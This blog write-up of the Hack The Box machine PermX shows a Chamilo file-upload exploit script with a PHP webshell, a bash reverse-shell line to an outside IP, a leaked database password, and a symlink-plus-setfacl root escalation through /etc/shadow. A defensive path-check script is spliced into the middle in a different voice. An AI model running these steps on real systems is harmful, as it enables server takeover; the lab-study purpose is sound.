Trance Shift 8 - Tech

A memo where I write up CTF writeups.

Writeup | Hack the Box: PermX

This one is Season 5 too. On EASY machines, it feels like once you find a password you can often get in just by trying it as a login.

HTB PermX

nmap

# add to hosts
echo "10.129.135.205 permx.htb" | sudo tee -a /etc/hosts
$ nmap -sC -A permx.htb
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://permx.htb
|_http-server-header: Apache/2.4.52 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
  • The usual SSH/HTTP setup

http://permx.htb/

Subdomain enumeration

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
  -H "Host: FUZZ.permx.htb" \
  -u http://permx.htb/ \
  -fc 302
www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 497ms]
lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 286ms]
echo "10.129.135.205 www.permx.htb" | sudo tee -a /etc/hosts
echo "10.129.135.205 lms.permx.htb" | sudo tee -a /etc/hosts

http://lms.permx.htb/

Chamilo (CMS)

cat > exploit.py
python3 exploit.py -u http://lms.permx.htb/ -c 'id > /tmp/pwned'
An error has occured, URL is not vulnerable: http://lms.permx.htb/

Not this one.

python3 exploit2.py -u http://lms.permx.htb/ rce -p system id
Overwriting session file at: ../../../../../../../../tmp/sess_sJY7EXvdQiMhPRqe9RGIwoF29l4geYiM
Setting ch_sid=sJY7EXvdQiMhPRqe9RGIwoF29l4geYiM
Invoking system() with arguments: id
Found data:

URL not vulnerable: http://lms.permx.htb/

Not this one either.

msfconsole
msf6 > search CVE-2023-34960
msf6 > use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960
...
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. No valid response received from the target. "set ForceExploit true" to override check result.

Not this one either, hm.

Is Indexes on?

parameters:
    database_driver: pdo_mysql
    database_host: 127.0.0.1
    database_port: ~
    database_name: chamilo111
    database_user: root
    database_password: root

    mailer_transport: smtp
    mailer_host: 127.0.0.1
    mailer_user: ~
    mailer_password: ~

Doesn't look like it'll be useful. There seems to be a lot here, so let's fuzz it.

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://lms.permx.htb/FUZZ
.htaccess               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 251ms]
                        [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 501ms]
.hta                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2000ms]
.htpasswd               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 4703ms]
app                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 440ms]
bin                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 249ms]
certificates            [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 250ms]
documentation           [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 249ms]
favicon.ico             [Status: 200, Size: 2462, Words: 3, Lines: 2, Duration: 251ms]
index.php               [Status: 200, Size: 19356, Words: 4910, Lines: 353, Duration: 282ms]
LICENSE                 [Status: 200, Size: 35147, Words: 5836, Lines: 675, Duration: 253ms]
main                    [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 292ms]
plugin                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 249ms]
robots.txt              [Status: 200, Size: 748, Words: 75, Lines: 34, Duration: 272ms]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 250ms]
src                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 305ms]
vendor                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 251ms]
web.config              [Status: 200, Size: 5780, Words: 1119, Lines: 107, Duration: 250ms]
web                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 265ms]

Suspicious-looking ones

CVE-2023-4220/4224 BigUpload

This one needs a learner account - https://www.cve.org/CVERecord?id=CVE-2023-4224 - https://starlabs.sg/advisories/23/23-4224/

This one doesn't - https://www.cve.org/CVERecord?id=CVE-2023-4220 - https://github.com/charlesgargasson/CVE-2023-4220

$ cat exploit.sh                                                                             
#!/bin/bash
HOST='http://lms.permx.htb'
CMD='id'

URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'

cat <<'EOF'>/tmp/rce.php
<?php
$a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
?>
EOF

curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD"
CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
curl "$HOST/$URL_FILE?aoOoy=$CMD"
└─$ sh exploit.sh                                                                              
The file has successfully been uploaded.uid=33(www-data) gid=33(www-data) groups=33(www-data)

Got it!

└─$ head exploit.sh 
#!/bin/bash
HOST='http://lms.permx.htb'
CMD='bash -c "bash -i >& /dev/tcp/10.10.16.23/4444 0>&1"'
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami
www-data
www-data@permx:/var/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data => mtz

www-data@permx:/var/www$ ls -la /home
total 12
drwxr-xr-x  3 root root 4096 Jan 20 18:10 .
drwxr-xr-x 18 root root 4096 Jul  1 13:05 ..
drwxr-x---  4 mtz  mtz  4096 Jun  6 05:24 mtz
  • /var/www/chamilo/app/config/configuration.php
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

There's a DB password here, but now what...

 ssh mtz@permx.htb                                                                   
mtz@permx.htb's password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64)
...
mtz@permx:~$ whoami
mtz
mtz@permx:~$ cat user.txt
XXXX

I'm in.

sudo

mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:                                                    
    env_reset, mail_badpass,                                                                   
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,  
    use_pty                                                                                    
                                                                                               
User mtz may run the following commands on permx:                                              
    (ALL : ALL) NOPASSWD: /opt/acl.sh

The usual sudo escape.

mtz@permx:~$ cat /opt/acl.sh                                                                  
#!/bin/bash                                                                                    
                                                                                               
if [ "$#" -ne 3 ]; then                                                                        
    /usr/bin/echo "Usage: $0 user perm file"                                                   
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
sudo /opt/acl.sh root rwx /home/mtz/vi

This kind of invocation is possible, but the target path is restricted: it must start with "/home/mtz/" and must not contain "..". On top of that, as a symlink countermeasure, it also checks whether the target is a file.

  • Want to somehow make /opt/acl.sh editable
    • /home/mtz/ is mandatory
    • .. cannot be used
  • So, work around it with a symlink
    • ln -s / /home/mtz/root
    • setfacl /home/mtz/root/shadow
    • write in a root password
mtz@permx:~$ ln -s / root
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow
mtz@permx:~$ ls -la /etc/shadow
-rw-rwx---+ 1 root shadow 1119 Jul  9 00:06 /etc/shadow
mtz@permx:~$ getfacl /etc/shadow
getfacl: Removing leading '/' from absolute path names
# file: etc/shadow
# owner: root
# group: shadow
user::rw-
user:mtz:rwx
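The bypass above works because acl.sh validates only the path string, and [ -f ] follows symlinks, so /home/mtz/root -> / passes every check. As an added example (not the box's script and not from the writeup), here is the kind of target check that would have blocked it: the path is canonicalized first and the resolved location must stay inside the allowed directory. The allowed directory is a parameter here, an assumption made so the function can be exercised on a temp dir; the real script would hard-code /home/mtz.

```bash
#!/bin/bash
# Added example, not the box's /opt/acl.sh. The original matches the path
# *string* ("/home/mtz/*", no "..") and uses [ -f ], which follows symlinks.
# Here the path is resolved with realpath and the *resolved* file must lie
# strictly inside BASE. BASE is a parameter (hypothetical) for testability.

# safe_target BASE TARGET -> returns 0 if TARGET is a regular, non-symlink file
# whose fully resolved path lies strictly inside BASE; returns 1 otherwise.
safe_target() {
    local base="$1" target="$2" real_base real_target
    # -e: every path component must exist, otherwise reject
    real_base=$(realpath -e -- "$base" 2>/dev/null) || return 1
    real_target=$(realpath -e -- "$target" 2>/dev/null) || return 1
    # the target itself must not be a symlink, even one pointing back inside BASE
    if [ -L "$target" ]; then
        return 1
    fi
    # after resolution it must be a regular file (no directories, devices, ...)
    if [ ! -f "$real_target" ]; then
        return 1
    fi
    # the resolved path must start with the resolved base directory plus "/";
    # this catches symlinked parent components and "..", whatever the string looks like
    case "$real_target" in
        "$real_base"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Stand-alone usage: ./check.sh /home/mtz /home/mtz/root/etc/shadow
if [ "$#" -eq 2 ]; then
    if safe_target "$1" "$2"; then
        echo "allowed: $2"
    else
        echo "denied: $2"
    fi
fi
```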
  • For some reason the permission gets revoked after about 3 minutes...
    • It seems to get reset, so do it quickly
# any password will do
mkpasswd -m sha-512 passwd
$6$sYeguGCxuj27fXWi$11KdBNmu2T6gy1.E0STz1x26/QQdN4t05S2eAAsj57b0PrWExNtshi3L98aVW3Zkl2nXbKEewyOJcqZFoLRPL1
ln -s / /home/mtz/root
sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow
vi /etc/shadow
root@permx:/home/mtz# whoami
root
root@permx:/home/mtz# cat /root/root.txt
XXXX

GJ!